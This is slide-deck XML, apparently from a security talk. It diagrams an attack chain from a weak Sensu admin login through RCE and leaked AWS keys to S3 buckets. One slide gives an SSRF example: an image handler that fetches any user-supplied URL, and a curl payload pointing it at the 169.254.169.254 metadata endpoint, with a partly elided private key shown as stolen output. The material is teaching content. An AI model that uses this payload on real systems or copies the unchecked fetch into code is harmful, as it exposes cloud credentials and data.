          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5997475" y="2037687"/>
            <a:ext cx="2360700" cy="2360700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785350" y="2108350"/>
            <a:ext cx="22647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363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>sensu.instagram.com</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="979" name="Google Shape;979;p142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3447850" y="2108350"/>
            <a:ext cx="22647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363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>AWS S3 - Key #1</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="980" name="Google Shape;980;p142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045475" y="2108350"/>
            <a:ext cx="22647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363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>AWS S3 - Key #2</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="981" name="Google Shape;981;p142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892350" y="2604825"/>
            <a:ext cx="961200" cy="7446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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2007271" y="2604825"/>
            <a:ext cx="961200" cy="7446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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839050" y="2702775"/>
            <a:ext cx="10680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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Sensu-Admin (web)</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="984" name="Google Shape;984;p142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953875" y="2702775"/>
            <a:ext cx="10680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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Super weak accounts</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985" name="Google Shape;985;p142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2007271" y="3502900"/>
            <a:ext cx="961200" cy="7446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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953875" y="3600850"/>
            <a:ext cx="10680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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Config.json</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">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FFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>AWS Key #1</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="987" name="Google Shape;987;p142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4078571" y="2506875"/>
            <a:ext cx="961200" cy="7446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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025175" y="2604825"/>
            <a:ext cx="10680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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Autoscale bucket </a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">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1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>AWS Key #2</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="989" name="Google Shape;989;p142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4078571" y="3404950"/>
            <a:ext cx="961200" cy="7446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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025175" y="3502900"/>
            <a:ext cx="10680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FFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Other inaccessible buckets</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991" name="Google Shape;991;p142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546427" y="2506875"/>
            <a:ext cx="1419600" cy="16428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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493025" y="2604825"/>
            <a:ext cx="1374000" cy="5649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Clr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Keys</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-292100" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Pictures</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-292100" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Everything</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="993" name="Google Shape;993;p142"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="986" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230575" y="3401800"/>
            <a:ext cx="723300" cy="473400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -805"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="363F44"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="994" name="Google Shape;994;p142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892350" y="3849675"/>
            <a:ext cx="10680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363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="995" name="Google Shape;995;p142"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="986" idx="3"/>
            <a:endCxn id="988" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3021875" y="2879200"/>
            <a:ext cx="1003200" cy="996000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20831"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="363F44"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="996" name="Google Shape;996;p142"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5093175" y="2314300"/>
            <a:ext cx="1269300" cy="564900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 60025"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="363F44"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>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2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SSRF Example</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1718" name="Google Shape;1718;p241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4774250" y="1302475"/>
            <a:ext cx="4623600" cy="25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54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>curl duo.com?img_url=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>169.254.169.254/latest/user-data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>DEPLOY_PRIVATE_KEY = '''\</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="74777D"/>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i="1">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-----BEGIN RSA PRIVATE KEY-----</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="74777D"/>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i="1">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>MIIEpAIBAAKCAQEAu/JhMBoH+XQfMMAVj23h</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="74777D"/>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i="1">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>n2VHa2HeDJi3FLri3Be5Ky/qZPSCdZdlX50+xrrZ</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="74777D"/>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i="1">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>…..</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="74777D"/>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i="1">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FoPRXT7zgepKBVzf7+m1PxViHJxthPw/p0BVbc</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="74777D"/>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i="1">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>6OVA==</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="74777D"/>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i="1">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-----END RSA PRIVATE KEY-----</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="74777D"/>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200" i="1">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'''</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="74777D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1719" name="Google Shape;1719;p241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4764100" y="1162550"/>
            <a:ext cx="3509700" cy="52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BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Stealing Instance User Data</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1720" name="Google Shape;1720;p241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325775" y="1516175"/>
            <a:ext cx="4029000" cy="11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BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># pull the user’s profile image to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># cache for later usage</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def image_request_handler(img_url):</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="74777D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    resp = requests.get(img_url)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="74777D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="74777D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    return resp.data</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="74777D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1721" name="Google Shape;1721;p241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311350" y="1162550"/>
            <a:ext cx="3546300" cy="50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BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Server-Side Image Caching</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
